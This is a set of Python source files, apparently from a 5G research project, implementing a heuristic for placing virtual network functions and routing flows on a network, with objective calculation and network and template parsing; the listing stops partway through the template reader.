{
  "source": "5GCity/5GCity-resource-placement",
  "score": 2
}
#### File: bjointsp/heuristic/control.py
```python
import math
import time
import logging
import bjointsp.objective as objective
from collections import defaultdict
from bjointsp.heuristic import heuristic
from bjointsp.heuristic import improvement
from bjointsp.heuristic import shortest_paths as sp
from bjointsp.overlay.instance import Instance

# global variables for easy access by all functions
nodes, links, prev_instances, obj = None, None, None, None


# return dict of currently consumed node resources based on the instances of the specified overlays
def consumed_node_resources(overlays):
    consumed_cpu, consumed_mem = {}, {}
    # reused instances exist in multiple overlays with different ingoing edges -> duplicates must be allowed -> use a list, not a set
    instances = [i for t in overlays.keys() for i in overlays[t].instances]
    for v in nodes.ids:
        consumed_cpu[v] = sum(i.consumed_cpu() for i in instances if i.location == v)
        consumed_mem[v] = sum(i.consumed_mem() for i in instances if i.location == v)
    return consumed_cpu, consumed_mem


# return the objective value based on the specified overlays
def objective_value(overlays, print_info=False):
    # check the delay of each edge; if too high, return math.inf (infeasible)
    edges = [e for ol in overlays.values() for e in ol.edges]
    for e in edges:
        for path in e.paths:
            if sp.path_delay(links, path) > e.arc.max_delay:
                print("Embedding INFEASIBLE because delay of path of {} is too high".format(e))
                logging.warning("Embedding INFEASIBLE because delay of path of {} is too high".format(e))
                return math.inf

    # calculate changed instances (compared to previous instances)
    curr_instances = {i for ol in overlays.values() for i in ol.instances}
    changed = prev_instances ^ curr_instances  # instances that were added or removed

    # record max over-subscription of node capacities
    consumed_cpu, consumed_mem = consumed_node_resources(overlays)
    max_cpu_over, max_mem_over = 0, 0
    for v in nodes.ids:
        if consumed_cpu[v] - nodes.cpu[v] > max_cpu_over:
            max_cpu_over = consumed_cpu[v] - nodes.cpu[v]
        if consumed_mem[v] - nodes.mem[v] > max_mem_over:
            max_mem_over = consumed_mem[v] - nodes.mem[v]

    # calculate the data rate of each link and mark used links for each edge
    consumed_dr = defaultdict(int)  # default = 0
    link_used = {}
    edges = [e for ol in overlays.values() for e in ol.edges]
    for e in edges:
        for path in e.paths:
            # go along the nodes of the path and increment the data rate of each traversed link
            for i in range(len(path) - 1):
                # skip connections on the same node without a link (both instances at the same node)
                if path[i] != path[i + 1]:
                    # assume the edge dr is split equally among all paths (currently only 1 path per edge)
                    consumed_dr[(path[i], path[i + 1])] += e.flow_dr() / len(e.paths)
                    link_used[(e.arc, e.source.location, e.dest.location, path[i], path[i + 1])] = 1

    # record max over-subscription of link capacity
    max_dr_over = 0
    for l in links.ids:
        if consumed_dr[l] - links.dr[l] > max_dr_over:
            max_dr_over = consumed_dr[l] - links.dr[l]

    # calculate the total delay over all used links (by different edges)
    total_delay = 0
    for key in link_used:
        total_delay += links.delay[(key[3], key[4])]

    # calculate the total vnf delay of all instances and add it to total_delay
    vnf_delays = 0
    for i in curr_instances:
        vnf_delays += i.component.vnf_delay
    total_delay += vnf_delays

    # calculate total consumed resources
    total_consumed_cpu = sum(consumed_cpu[v] for v in nodes.ids)
    total_consumed_mem = sum(consumed_mem[v] for v in nodes.ids)
    total_consumed_dr = sum(consumed_dr[l] for l in links.ids)

    # print objective value info
    if print_info:
        print("Max over-subscription: {} (cpu), {} (mem), {} (dr)".format(max_cpu_over, max_mem_over, max_dr_over))
        print("Total delay: {}, Num changed instances: {}".format(total_delay, len(changed)))
        print("Total consumed resources: {} (cpu), {} (mem), {} (dr)".format(total_consumed_cpu, total_consumed_mem, total_consumed_dr))
        logging.info("Max over-subscription: {} (cpu), {} (mem), {} (dr)".format(max_cpu_over, max_mem_over, max_dr_over))
        logging.info("Total delay: {}, Num changed instances: {}".format(total_delay, len(changed)))
        logging.info("Total consumed resources: {} (cpu), {} (mem), {} (dr)".format(total_consumed_cpu, total_consumed_mem, total_consumed_dr))

    # calculate the objective value; objectives & weights have to be identical to the MIP
    # lexicographical combination of all objectives
    if obj == objective.COMBINED:
        w1 = 100 * 1000 * 1000  # assuming changed instances < 100
        w2 = 1000 * 1000        # assuming total resource consumption < 1000
        w3 = 1000               # assuming total delay < 1000
        value = w1 * (max_cpu_over + max_mem_over + max_dr_over)
        value += w2 * len(changed)
        value += w3 * (total_consumed_cpu + total_consumed_mem + total_consumed_dr)
        value += total_delay
    # minimize max over-subscription
    elif obj == objective.OVER_SUB:
        value = max_cpu_over + max_mem_over + max_dr_over
    # minimize changed instances (compared to the previous embedding)
    elif obj == objective.CHANGED:
        value = len(changed)
    # minimize total resource consumption
    elif obj == objective.RESOURCES:
        value = total_consumed_cpu + total_consumed_mem + total_consumed_dr
    # minimize total delay
    elif obj == objective.DELAY:
        value = total_delay
    else:
        logging.error("Objective {} unknown".format(obj))
        raise ValueError("Objective {} unknown".format(obj))

    return value


# return a dict with the total source data rate for each source component
def total_source_drs(sources):
    src_drs = defaultdict(int)  # default = 0
    for src in sources:
        src_drs[src.component] += src.dr
    return src_drs


def solve(arg_nodes, arg_links, templates, prev_overlays, sources, fixed, arg_obj):
    # write global variables
    global nodes, links, prev_instances, obj
    nodes = arg_nodes
    links = arg_links
    # copy previous instances (attributes like edges_in etc. are not needed and not copied)
    prev_instances = {Instance(i.component, i.location, i.src_flows) for ol in prev_overlays.values() for i in ol.instances}
    obj = arg_obj

    # print input
    print("Templates:", *templates, sep=" ")
    print("Sources:", *sources, sep=" ")
    print("Fixed instances:", *fixed, sep=" ")
    print("Previous instances:", *prev_instances, sep=" ")

    # pre-computation of shortest paths
    start_init = time.time()
    shortest_paths = sp.all_pairs_shortest_paths(nodes, links)
    init_time = time.time() - start_init
    print("Time for pre-computation of shortest paths: {}s\n".format(init_time))
    logging.info("Time for pre-computation of shortest paths: {}s\n".format(init_time))

    start_heuristic = time.time()
    # get the total source data rate for each source component (for sorting the templates later)
    src_drs = defaultdict(int)  # default = 0
    for src in sources:
        src_drs[src.component] += src.total_flow_dr()
    # sort templates by decreasing weight: the heaviest/most difficult templates get embedded first
    templates.sort(key=lambda t: t.weight(src_drs[t.source()]), reverse=True)
    print("Templates sorted to start with heaviest:", *templates, sep=" ")

    # initial solution
    # print("\n----- Initial solution -----")
    logging.info("----- Initial solution -----")
    overlays = heuristic.solve(arg_nodes, arg_links, templates, prev_overlays, sources, fixed, shortest_paths)
    obj_value = objective_value(overlays)
    # print("Objective value of initial solution: {}".format(obj_value))
    # print("Runtime for initial solution: {}".format(time.time() - start_heuristic))
    logging.info("Objective value of initial solution: {}".format(obj_value))
    logging.info("Runtime for initial solution: {}\n".format(time.time() - start_heuristic))

    # iterative improvement
    if len(nodes.ids) > 1:  # doesn't work for networks with just 1 node
        # print("\n----- Iterative improvement -----")
        logging.info("----- Iterative improvement -----")
        overlays = improvement.improve(arg_nodes, arg_links, templates, overlays, sources, fixed, shortest_paths)
        obj_value = objective_value(overlays)
        runtime = time.time() - start_heuristic
        # print("Objective value after improvement: {}".format(obj_value))
        # print("Heuristic runtime: {}s".format(runtime))
        logging.info("Objective value after improvement: {}".format(obj_value))
        logging.info("Heuristic runtime: {}s".format(runtime))
    else:
        runtime = time.time() - start_heuristic
        # print("Skip iterative improvement for network with just 1 node")
        logging.info("Skip iterative improvement for network with just 1 node")

    # calculate changed instances for writing the result
    curr_instances = {i for ol in overlays.values() for i in ol.instances}
    changed = prev_instances ^ curr_instances  # instances that were added or removed

    return init_time, runtime, obj_value, changed, overlays
```
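The `COMBINED` branch of `objective_value` separates the four criteria lexicographically by spacing them with large weights, so a single unit of over-subscription always outweighs any number of changed instances, and so on. A minimal sketch of that weighting on made-up numbers (all values below are hypothetical, not from a real run):

```python
# Hypothetical illustration of the lexicographic weighting used in objective_value.
w1, w2, w3 = 100 * 1000 * 1000, 1000 * 1000, 1000

max_over_sub = 2        # cpu + mem + dr over-subscription
num_changed = 3         # changed instances vs. the previous embedding
total_resources = 57    # total consumed cpu + mem + dr
total_delay = 140       # summed link + VNF delay

value = w1 * max_over_sub + w2 * num_changed + w3 * total_resources + total_delay
print(value)  # 203057140: over-subscription dominates, then changes, resources, delay
```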
#### File: bjointsp/heuristic/heuristic.py
```python
import math
import logging
import random
from collections import OrderedDict  # for deterministic behavior
from bjointsp.overlay.edge import Edge
from bjointsp.overlay.instance import Instance
from bjointsp.overlay.overlay import Overlay

# global variables for easy access by all functions
nodes, links, shortest_paths, overlays = None, None, None, None


# return the outgoing arc of the specified component at the specified output in the specified direction
def out_arc(template, component, output, direction):
    out_arcs = [a for a in template.arcs if a.starts_at(direction, output, component)]
    # there is at most one arc per output and direction; the arc might belong to another template (then none is found here)
    if len(out_arcs) == 1:
        return out_arcs[0]
    elif len(out_arcs) == 0:
        return None
    else:
        raise ValueError("#outgoing arcs of {} at {} output {} is {}. It should be at most 1 per output and template."
                         .format(component, direction, output, len(out_arcs)))


# remove the specified instance and its in- and outgoing edges from all overlays/the specified overlay
# if the instance is stateful, also remove it from passed_stateful of all flows
def remove_instance(instance, overlay=None):
    # if an overlay is specified, only remove from that overlay; else from all
    if overlay is not None:
        overlays_to_update = [overlay]
    else:
        overlays_to_update = overlays.values()

    # remove the instance and associated edges from overlays_to_update and update flows
    for ol in overlays_to_update:
        flows_to_update = [f for e in ol.edges for f in e.flows if instance in f.passed_stateful.values()]
        for f in flows_to_update:
            f.passed_stateful = {k: v for k, v in f.passed_stateful.items() if v != instance}

        if instance in ol.instances:
            ol.instances = [i for i in ol.instances if i != instance]
            # print("\tRemoved instance {} from overlay of {}".format(instance, ol.template))
            logging.info("\tRemoved instance {} from overlay of {}".format(instance, ol.template))

        edges_to_remove = [e for e in ol.edges if e.source == instance or e.dest == instance]
        for e in edges_to_remove:
            remove_edge(e, overlay)


# remove the specified edge from all overlays/the specified overlay and from the instances
def remove_edge(edge, overlay=None):
    # remove mapped dr
    for f in edge.flows:
        del f.dr[edge]
    # remove the edge from the specified overlay or from all (if none is specified) and update the instances
    for ol in overlays.values():
        if ol == overlay or overlay is None:
            if edge in ol.edges:
                ol.edges.remove(edge)
            for i in ol.instances:
                i.edges_in = {key: e for key, e in i.edges_in.items() if e != edge}
                i.edges_out = {key: e for key, e in i.edges_out.items() if e != edge}
    # print("\tRemoved edge {}".format(edge))
    logging.info("\tRemoved edge {}".format(edge))


# remove the specified flow: remove its mapping from/to edges, remove edges that are now "empty" (without mapped flows)
def remove_flow(overlay, flow):
    # print("Removing outdated flow {} and corresponding edges (without other flows)".format(flow))
    logging.info("Removing outdated flow {} and corresponding edges (without other flows)".format(flow))
    for e in list(overlay.edges):  # iterate over a copy as edges are removed during the loop
        # remove mappings
        if flow in e.flows:
            e.flows.remove(flow)
            del flow.dr[e]
        # remove empty edges
        if not e.flows:
            remove_edge(e, overlay)


# return dict of currently consumed node resources
# ignore the idle cpu/mem consumption of the instances of the component specified in ignore_idle
def consumed_node_resources(ignore_idle=None):
    consumed_cpu, consumed_mem = {}, {}
    # reused instances exist in multiple overlays with different ingoing edges -> duplicates must be allowed (use a list)
    instances = [i for t in overlays.keys() for i in overlays[t].instances]
    for v in nodes.ids:
        consumed_cpu[v] = sum(i.consumed_cpu(ignore_idle) for i in instances if i.location == v)
        consumed_mem[v] = sum(i.consumed_mem(ignore_idle) for i in instances if i.location == v)
    return consumed_cpu, consumed_mem


# return dict of nodes with enough remaining node resources (based on delta_dr and the component's requirements)
# ignore nodes that are too far away, i.e., with a too high delay, and nodes that are on the tabu list
# keys: nodes, values: (remaining cpu, remaining mem)
def candidate_nodes(start_node, arc, delta_dr, tabu=set()):
    # increase ingoing dr: delta_dr at the corresponding input, 0 elsewhere
    delta_in_dr = []
    for i in range(arc.dest.inputs + arc.dest.inputs_back):
        if arc.direction == "forward" and i == arc.dest_in:
            delta_in_dr.append(delta_dr)
        elif arc.direction == "backward" and i == arc.dest.inputs + arc.dest_in:
            delta_in_dr.append(delta_dr)
        else:
            delta_in_dr.append(0)

    # get currently consumed node resources without the idle consumption of dest-instances (to avoid subtracting it twice)
    consumed_cpu, consumed_mem = consumed_node_resources(arc.dest)

    # only consider nodes that are close enough (short delay) and that are not on the tabu list for the component
    allowed_nodes = [v for v in nodes.ids if shortest_paths[(start_node, v)][2] <= arc.max_delay
                     and (arc.dest, v) not in tabu]

    # check each node and add it if it has enough of the required resources remaining
    candidates = OrderedDict()
    for v in allowed_nodes:
        remaining_cpu = nodes.cpu[v] - consumed_cpu[v]
        remaining_mem = nodes.mem[v] - consumed_mem[v]
        if remaining_cpu - arc.dest.cpu_req(delta_in_dr) >= 0 and remaining_mem - arc.dest.mem_req(delta_in_dr) >= 0:
            candidates[v] = (remaining_cpu, remaining_mem)

    return candidates


# return the best node to create an edge to (from a given location, along a given arc, excluding tabu instances)
# FUTURE WORK: favor nodes with suitable instances -> encourage reuse of existing instances -> better objective 2
def find_best_node(overlay, start_location, arc, delta_dr, fixed, tabu):
    # candidate nodes with enough remaining node capacity
    candidates = candidate_nodes(start_location, arc, delta_dr, tabu)
    # print("\tCandidate nodes for component {}:".format(arc.dest))
    logging.debug("\tCandidate nodes for component {}:".format(arc.dest))
    for v in candidates.keys():
        # print("\t\t{} with {}".format(v, candidates[v]))
        logging.debug("\t\t{} with {}".format(v, candidates[v]))

    # fixed instances need special treatment: they cannot be added or removed => enforce reuse
    if fixed:
        # print("Component {} has fixed instances, which have to be used (no new instances allowed)".format(arc.dest))
        logging.info("Component {} has fixed instances, which have to be used (no new instances allowed)".format(arc.dest))
        fixed_nodes = [i.location for i in overlay.instances if i.component == arc.dest and
                       shortest_paths[(start_location, i.location)][2] <= arc.max_delay]
        candidates = {node: resources for node, resources in candidates.items() if node in fixed_nodes}

    # check all candidate nodes and place the instance at the node with the lowest resulting path weight (high dr, low delay)
    if len(candidates) > 0:
        path_weight = OrderedDict()
        for v in candidates.keys():
            path_weight[v] = shortest_paths[(start_location, v)][1]
        best_node = min(path_weight, key=path_weight.get)
    # if no node has remaining capacity, choose the node with the lowest over-subscription (within delay bounds)
    else:
        # print("No nodes with enough remaining resources. Choosing node with lowest over-subscription.")
        logging.info("No nodes with enough remaining resources. Choosing node with lowest over-subscription.")
        consumed_cpu, consumed_mem = consumed_node_resources()
        best_node = None
        min_over_subscription = math.inf
        min_path_weight = math.inf  # path weight of the current best node, used as tie breaker
        # only allow nodes that are close enough, i.e., with low enough delay, and that are not tabu
        allowed_nodes = [v for v in nodes.ids if shortest_paths[(start_location, v)][2] <= arc.max_delay
                         and (arc.dest, v) not in tabu]
        # if fixed, only allow nodes of fixed instances => enforce reuse
        if fixed:
            allowed_nodes = fixed_nodes
        for v in allowed_nodes:
            # use the sum of cpu and memory over-subscription to find nodes with little over-subscription of both
            over_subscription = (consumed_cpu[v] - nodes.cpu[v]) + (consumed_mem[v] - nodes.mem[v])
            if over_subscription <= min_over_subscription:
                path_weight = shortest_paths[(start_location, v)][1]
                if over_subscription < min_over_subscription or path_weight < min_path_weight:
                    best_node = v
                    min_over_subscription = over_subscription
                    min_path_weight = path_weight

    return best_node


# map the specified flow (with the specified flow_dr) to a possibly new edge from the start_instance
def map_flow2edge(overlay, start_instance, arc, flow, flow_dr, tabu):
    # determine whether the instances of the destination component are fixed => if so, no new instances can be placed
    fixed = False
    for i in overlay.instances:
        if i.component == arc.dest and i.fixed:
            fixed = True
            break
    best_node = find_best_node(overlay, start_instance.location, arc, flow_dr, fixed, tabu)

    # if an instance at the best node already exists (e.g., from the forward direction), just connect to it; else create a new one
    instance_exists = False
    for i in overlay.instances:
        if i.component == arc.dest and i.location == best_node:
            instance_exists = True
            dest_instance = i
            break
    # create a new instance if none exists in the overlay
    if not instance_exists:
        dest_instance = Instance(arc.dest, best_node)
        overlay.instances.append(dest_instance)
        # print("\tAdded new instance {} at best node {} (may exist in other overlays)".format(dest_instance, best_node))
        logging.info("\tAdded new instance {} at best node {} (may exist in other overlays)".format(dest_instance, best_node))

    # check whether an edge to dest_instance already exists
    edge_exists = False
    if instance_exists:
        if dest_instance in start_instance.edges_out.keys():
            edge_exists = True
            edge = start_instance.edges_out[dest_instance]
    # if it doesn't exist, create a new edge and assign a path (shortest path)
    if not edge_exists:
        edge = Edge(arc, start_instance, dest_instance)
        overlay.edges.append(edge)
        edge.paths.append(shortest_paths[(start_instance.location, dest_instance.location)][0])

    # map the flow to the edge
    flow.dr[edge] = flow_dr
    edge.flows.append(flow)
    # print("\tMapped flow {} (dr {}) to edge {} (new: {})".format(flow, flow_dr, edge, not edge_exists))
    logging.info("\tMapped flow {} (dr {}) to edge {} (new: {})".format(flow, flow_dr, edge, not edge_exists))


# map out_flows to edges back to the same stateful instances that were passed in the forward direction
def map_flows2stateful(overlay, start_instance, arc, out_flows):
    # remove any existing mappings of flows to edges along the arc
    for e in start_instance.edges_out.values():
        if e.arc == arc:
            e.flows = []

    # add the currently outgoing flows to edges back to the stateful instances (create edges if necessary)
    for f in out_flows:
        dest_inst = f.passed_stateful[arc.dest]
        if dest_inst in start_instance.edges_out.keys():
            new_edge = False
            edge = start_instance.edges_out[dest_inst]
        else:
            new_edge = True
            edge = Edge(arc, start_instance, dest_inst)
            edge.paths.append(shortest_paths[(start_instance.location, dest_inst.location)][0])
            overlay.edges.append(edge)
        f.dr[edge] = out_flows[f]
        edge.flows.append(f)
        # print("\tMapped flow {} (dr {}) to edge {} (new: {}) back to same stateful instance".format(f, out_flows[f], edge, new_edge))
        logging.info("\tMapped flow {} (dr {}) to edge {} (new: {}) back to same stateful instance".format(f, out_flows[f], edge, new_edge))


# update the mapping of flows leaving the start_instance along the specified arc
def update_flow_mapping(overlay, start_instance, arc, out_flows, tabu):
    flow_mapping = {f: e for e in start_instance.edges_out.values() if e.arc == arc for f in e.flows}
    # remove outdated flows
    for f in list(flow_mapping.keys()):
        if f not in out_flows:
            del f.dr[flow_mapping[f]]
            flow_mapping[f].flows.remove(f)
            del flow_mapping[f]
            # print("\tRemoved outdated flow {} along {}".format(f, arc))

    # enforce the return of flows to the same stateful instances as passed in the forward direction
    if arc.dest.stateful and arc.direction == "backward":
        map_flows2stateful(overlay, start_instance, arc, out_flows)
    # update the dr of mapped flows and map new ones
    else:
        # sort flows for determinism and reproducibility (same results with the same seed)
        ordered_flows = [f for f in sorted(out_flows, key=lambda flow: flow.id)]
        # shuffle the order to map flows in a different order in different iterations;
        # determinism and reproducibility are maintained (same seed => same shuffle)
        random.shuffle(ordered_flows)
        for f in ordered_flows:
            if f in flow_mapping:
                f.dr[flow_mapping[f]] = out_flows[f]  # update data rate
                # print("\tUpdated dr of existing flow {} (Now: {})".format(f, f.dr[flow_mapping[f]]))
                # FUTURE WORK: maybe check if capacity is violated => if yes, reassign the flow to a different edge;
                # but this might also be fixed during iterative improvement
            else:
                map_flow2edge(overlay, start_instance, arc, f, out_flows[f], tabu)
                # FUTURE WORK: maybe minimize the number of (new) edges by combining flows into one edge or preferring existing edges (obj 2)

    # remove empty edges
    for e in start_instance.edges_out.values():
        if e.arc == arc and not e.flows:
            # print("\nRemoved empty edge {}".format(e))
            logging.info("\nRemoved empty edge {}".format(e))
            remove_edge(e, overlay)


# update sources (add, remove), update source flows, reset passed_stateful of all flows
def update_sources(overlay, sources):
    # reset passed_stateful for all flows (set up to date later) and remove outdated flows
    # print("Reset passed_stateful for all flows of template {}".format(overlay.template))
    src_flows = {f for src in sources for f in src.flows}
    mapped_flows = {f for e in overlay.edges for f in e.flows} | {f for src in sources for f in src.flows}
    for f in mapped_flows:
        f.passed_stateful.clear()
        if f not in src_flows:
            remove_flow(overlay, f)

    # add/update source instances
    for src in sources:
        # check for an existing source instance at the location
        src_exists = False
        for i in overlay.instances:
            if i.component == src.component and i.location == src.location:
                src_exists = True
                break

        # update or add the source instance depending on whether such an instance already exists
        if src_exists:
            # remove outdated flows
            for f in i.src_flows:
                if f not in src.flows:
                    i.src_flows.remove(f)
                    for e in f.dr:
                        e.flows.remove(f)
                    f.dr.clear()
                    f.passed_stateful.clear()
            # update or add new flows
            for f in src.flows:
                # if the flow already exists, keep the existing flow and only update its src_dr
                if f in i.src_flows:
                    new_src_dr = f.src_dr
                    f = i.src_flows[i.src_flows.index(f)]  # get the existing flow object in i.src_flows
                    f.src_dr = new_src_dr
                # else add the new flow
                else:
                    i.src_flows.append(f)
                f.passed_stateful[i.component] = i
            # print("Updated/checked src_flows of existing source instance {}".format(i))
            logging.info("Updated/checked src_flows of existing source instance {}".format(i))
        else:
            src_instance = Instance(src.component, src.location, src.flows)
            overlay.instances.append(src_instance)
            # print("Added new source instance {}".format(src_instance))
            logging.info("Added new source instance {}".format(src_instance))

    # remove old source instances without a corresponding source
    source_instances = [i for i in overlay.instances if i.component.source]
    for src in source_instances:
        corresponding_sources = {s for s in sources if s.component == src.component and s.location == src.location}
        if len(corresponding_sources) == 0:
            # print("Remove source instance {} without corresponding source".format(src))
            logging.info("Remove source instance {} without corresponding source".format(src))
            remove_instance(src)


# create an initial solution for the provided input
def solve(arg_nodes, arg_links, templates, prev_overlays, sources, fixed, arg_shortest_paths, tabu=set()):
    # print("Previous overlays:")
    # for ol in prev_overlays.values():
    #     ol.print()
    # tabu_string = ""
    # for i in tabu:
    #     tabu_string += "({},{}) ".format(i[0], i[1])
    # print("Tabu list: {}".format(tabu_string))

    # write global variables
    global nodes, links, shortest_paths, overlays
    nodes = arg_nodes
    links = arg_links
    shortest_paths = arg_shortest_paths
    # keep previous overlays of templates that still exist
    overlays = {t: ol for t, ol in prev_overlays.items() if t in templates}
    # create empty overlays for new templates
    for t in templates:
        if t not in overlays.keys():
            overlays[t] = Overlay(t, [], [])
            # print("Created empty overlay for new template {}".format(t))
            logging.info("Created empty overlay for new template {}".format(t))

    # remove all instances of fixed components => current fixed instances are added again later; previous ones are removed
    fixed_components = {f.component for f in fixed}
    fixed_instances = {i for ol in overlays.values() for i in ol.instances if i.component in fixed_components}
    # print("Remove any existing fixed instances:", *fixed_instances, sep=" ")
    for i in fixed_instances:
        remove_instance(i)

    # embed templates sequentially in the given order
    for t in templates:
        # print("\n-Embedding template: {}-".format(t))
        logging.info("-Embedding template: {}-".format(t))

        own_sources = [src for src in sources if src.component in t.components]
        update_sources(overlays[t], own_sources)

        # add fixed instances that match template t's components
        for f in fixed:
            if f.component in t.components:
                fixed_instance = Instance(f.component, f.location, fixed=True)
                if fixed_instance not in overlays[t].instances:
                    overlays[t].instances.append(fixed_instance)
                    # print("Added fixed instance of {} at {}".format(f.component, f.location))
                    logging.info("Added fixed instance of {} at {}".format(f.component, f.location))

        # iterate over all instances in topological order; start in forward direction, then switch to backward
        i = 0
        direction = "forward"
        while i < len(overlays[t].topological_order()):
            instance = overlays[t].topological_order()[i]
            # print("Topological order:", *overlays[t].topological_order(), sep=" ")

            # remove unused instances (except fixed instances)
            if not instance.fixed:
                if not instance.used(direction, overlays[t]):
                    # print("Removed unused instance {} from overlay of {}".format(instance, t))
                    logging.info("Removed unused instance {} from overlay of {}".format(instance, t))
                    remove_instance(instance, overlays[t])
                    continue

            # switch direction at the first instance of an end component (because the outgoing, not the ingoing, direction is considered)
            if instance.component.end:
                direction = "backward"

            # get outgoing flows (and their dr) for each output
            out_flows = instance.out_flows(direction)
            for k in range(len(out_flows)):
                arc = out_arc(t, instance.component, k, direction)
                # when a component is adapted for reuse, it has separate outputs for the arcs of different templates
                if arc is None:  # for output k, this template has no arc => skip to the next output
                    # print("{}'s outgoing arc at output {} in {} direction belongs to a different template. The output is skipped".format(instance, k, direction))
                    logging.debug("{}'s outgoing arc at output {} in {} direction belongs to a different template. The output is skipped".format(instance, k, direction))
                    continue
                update_flow_mapping(overlays[t], instance, arc, out_flows[k], tabu)
                # print("Updated the flow mapping along arc {} at {}\n".format(arc, instance))
                logging.info("Updated the flow mapping along arc {} at {}\n".format(arc, instance))

            i += 1
            # print()

        if overlays[t].empty():
            del overlays[t]
            # print("Deleted empty overlay of {}".format(t))
            logging.info("Deleted empty overlay of {}".format(t))
        # else:
        #     overlays[t].print()
        #     print("Topological order:", *overlays[t].topological_order(), sep=" ")
        #     print()

    return overlays
```
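The functions above repeatedly index the precomputed `shortest_paths` dict with a node pair and read a path at index `[0]`, a path weight at `[1]`, and a delay at `[2]`. A minimal sketch of that assumed structure, with made-up node IDs and numbers:

```python
# Hypothetical entry of the precomputed shortest_paths dict, as used by the heuristic:
# keys are (source_node, target_node), values are (path, weight, delay).
shortest_paths = {
    ("pop0", "pop2"): (["pop0", "pop1", "pop2"], 7, 12),  # made-up values
}

path, weight, delay = shortest_paths[("pop0", "pop2")]
print(path[0], path[-1], weight, delay)  # pop0 pop2 7 12
```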
#### File: bjointsp/network/nodes.py
```python
class Nodes:
    def __init__(self, ids, cpu, mem):
        self.ids = ids
        self.cpu = cpu
        self.mem = mem
```
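For illustration, a small hypothetical instantiation consistent with how `read_network` builds these objects (ids as "pop"-prefixed strings, capacities as dicts keyed by id; the numbers are invented):

```python
# Hypothetical example matching the structures produced by read_network
ids = ["pop0", "pop1", "pop2"]
cpu = {"pop0": 10, "pop1": 10, "pop2": 4}
mem = {"pop0": 32, "pop1": 32, "pop2": 8}

nodes = Nodes(ids, cpu, mem)
print(nodes.cpu["pop2"])  # 4
```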
#### File: bjointsp/read_write/reader.py
```python
import networkx as nx
import yaml
import numpy as np
from geopy.distance import vincenty
from bjointsp.fixed.fixed_instance import FixedInstance
from bjointsp.fixed.source import Source
from bjointsp.network.links import Links
from bjointsp.network.nodes import Nodes
from bjointsp.overlay.flow import Flow
from bjointsp.template.arc import Arc
from bjointsp.template.component import Component
from bjointsp.template.template import Template
from bjointsp.overlay.overlay import Overlay
from bjointsp.overlay.instance import Instance
from bjointsp.overlay.edge import Edge
import logging
from networkx.readwrite import json_graph


# remove empty values (from multiple delimiters in a row)
def remove_empty_values(line):
    result = []
    for i in range(len(line)):
        if line[i] != "":
            result.append(line[i])
    return result


# check all stateful components and set non-bidirectional components to non-stateful (required for constraints)
def update_stateful(template):
    for j in template.components:
        if j.stateful:
            used_forward = False
            used_backward = False
            for a in template.arcs:
                if a.direction == "forward" and a.source == j:
                    used_forward = True  # 1+ outgoing arc at j in forward direction
                if a.direction == "backward" and a.dest == j:
                    used_backward = True  # 1+ incoming arc at j in backward direction
            # if not used in both directions, set to non-stateful
            if not (used_forward and used_backward):
                print("Stateful component {} is not used bidirectionally and is set to non-stateful.".format(j))
                j.stateful = False


# read the substrate network using NetworkX and set the specified node and link capacities
# IMPORTANT: for consistency with the emulator, all node IDs are prefixed with "pop" and have to be
# referenced as such (e.g., in source locations)
def read_network(file, cpu, mem, dr):
    SPEED_OF_LIGHT = 299792458  # meter per second
    PROPAGATION_FACTOR = 0.77  # https://en.wikipedia.org/wiki/Propagation_delay

    # if not file.endswith(".graphml"):
    #     raise ValueError("{} is not a GraphML file".format(file))
    # network = nx.read_graphml(file, node_type=int)
    network = json_graph.node_link_graph(file)

    # set nodes
    node_ids = ["pop{}".format(n) for n in network.nodes]  # add "pop" to the node index (e.g., 1 --> pop1)
    # if specified, use the provided uniform node capacities
    if cpu is not None and mem is not None:
        node_cpu = {"pop{}".format(n): cpu for n in network.nodes}
        node_mem = {"pop{}".format(n): mem for n in network.nodes}
    # else try to read them from the node attributes (i.e., graphml)
    else:
        cpu = nx.get_node_attributes(network, 'cpu')
        mem = nx.get_node_attributes(network, 'mem')
        try:
            node_cpu = {"pop{}".format(n): cpu[n] for n in network.nodes}
            node_mem = {"pop{}".format(n): mem[n] for n in network.nodes}
        except KeyError:
            raise ValueError("No CPU or mem. specified for {} (as cmd argument or in graphml)".format(file))

    # set links
    link_ids = [("pop{}".format(e[0]), "pop{}".format(e[1])) for e in network.edges]
    if dr is not None:
        link_dr = {("pop{}".format(e[0]), "pop{}".format(e[1])): dr for e in network.edges}
    else:
        dr = nx.get_edge_attributes(network, 'dr')
        try:
            link_dr = {("pop{}".format(e[0]), "pop{}".format(e[1])): dr[e] for e in network.edges}
        except KeyError:
            raise ValueError("No link data rate specified for {} (as cmd argument or in graphml)".format(file))

    # calculate link delays based on the geo positions of the nodes; duplicate links for bidirectionality
    link_delay = {}
    for e in network.edges:
        n1 = network.nodes(data=True)[e[0]]
        n2 = network.nodes(data=True)[e[1]]
        n1_lat, n1_long = n1.get("Latitude"), n1.get("Longitude")
        n2_lat, n2_long = n2.get("Latitude"), n2.get("Longitude")
        distance = vincenty((n1_lat, n1_long), (n2_lat, n2_long)).meters  # in meters
        delay = (distance / SPEED_OF_LIGHT * 1000) * PROPAGATION_FACTOR  # in milliseconds
        # round the delay to int using np.around for consistency with the emulator
        link_delay[("pop{}".format(e[0]), "pop{}".format(e[1]))] = int(np.around(delay))

    # add reversed links for bidirectionality
    for e in network.edges:
        e = ("pop{}".format(e[0]), "pop{}".format(e[1]))
        e_reversed = (e[1], e[0])
        link_ids.append(e_reversed)
        link_dr[e_reversed] = link_dr[e]
        link_delay[e_reversed] = link_delay[e]

    nodes = Nodes(node_ids, node_cpu, node_mem)
    links = Links(link_ids, link_dr, link_delay)
    return nodes, links


# read a template from a yaml dictionary
def read_template(template, return_src_components=False):
    components, arcs = [], []
    # with open(file, "r") as template_file:
    #     template = yaml.load(template_file)
    for vnf in template["vnfs"]:
        inputs = (vnf["inputs_fwd"], vnf["inputs_bwd"])
        outputs = (vnf["outputs_fwd"], vnf["outputs_bwd"])
        outgoing = (vnf["out_fwd"], vnf["out_bwd"])
        # try to retrieve the image if it's in the template
        vnf_image = vnf.get("image", None)
        # get the VNF delay from the YAML if the key exists, otherwise default to 0
        vnf_delay = vnf.get("vnf_delay", 0)
        # check whether the vnf is a source but has cpu or mem requirements
        if vnf["type"] == "source" and ((len(vnf["cpu"]) == 1 and vnf["cpu"][0] > 0) or (len(vnf["mem"]) == 1 and vnf["mem"][0] > 0)):
            logging.info("\tSource component {} has CPU:{} and MEM:{} requirements. Check the template file".format(vnf['name'], vnf['cpu'], vnf['mem']))
            print("Source component {} has CPU:{} and MEM:{} requirements. Check the template file".format(vnf['name'], vnf['cpu'], vnf['mem']))
